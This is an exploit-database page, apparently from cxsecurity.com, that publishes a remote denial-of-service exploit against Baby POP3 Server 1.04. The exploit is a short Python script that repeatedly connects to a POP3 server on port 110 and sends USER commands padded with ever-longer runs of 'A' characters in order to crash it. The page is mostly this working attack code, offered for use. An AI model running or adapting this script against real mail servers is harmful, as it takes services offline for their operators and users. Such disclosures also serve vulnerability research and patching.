DOS Baby POP3 Server 1.04

2025.08.28
Credit: Érick Sousa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: DOS Baby POP3 Server 1.04 # Date: 12/08/2025 # Exploit Author: Érick Sousa (https://www.linkedin.com/in/erickssa) # Vendor Homepage: https://www.pablosoftwaresolutions.com # Software Link: https://www.pablosoftwaresolutions.com/html/baby_pop3_server.html # Version: Baby POP3 Server Version 1.04 # Tested on: Windows XP e Windows 7 # Python 3.13.5 ;) import socket jkcode = b"A" counter = 0 while counter < 10000: counter += 10 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.18.240", 110)) s.send(b"USER " + jkcode * counter + b"\r\n") s.close()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top